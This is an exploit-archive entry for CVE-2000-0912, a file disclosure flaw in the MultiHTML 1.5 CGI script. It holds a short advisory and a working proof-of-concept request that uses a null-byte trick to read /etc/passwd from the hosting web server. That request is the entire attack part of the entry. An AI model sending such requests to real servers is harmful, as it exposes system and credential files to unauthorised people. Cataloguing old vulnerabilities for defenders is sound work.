MultiHTML 1.5 - File Disclosure
| EKU-ID: 27693 | CVE: CVE-2000-0912;OSVDB-415 | OSVDB-ID: |
| Author: Niels Heinen | Published: 2000-09-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 27693 | CVE: CVE-2000-0912;OSVDB-415 | OSVDB-ID: |
| Author: Niels Heinen | Published: 2000-09-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/6711/info MultiHTML is prone to a file disclosure vulnerability. It is possible for remote attackers to issue requests which are capable of disclosing sensitive webserver readable resources on the system hosting the software. http://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html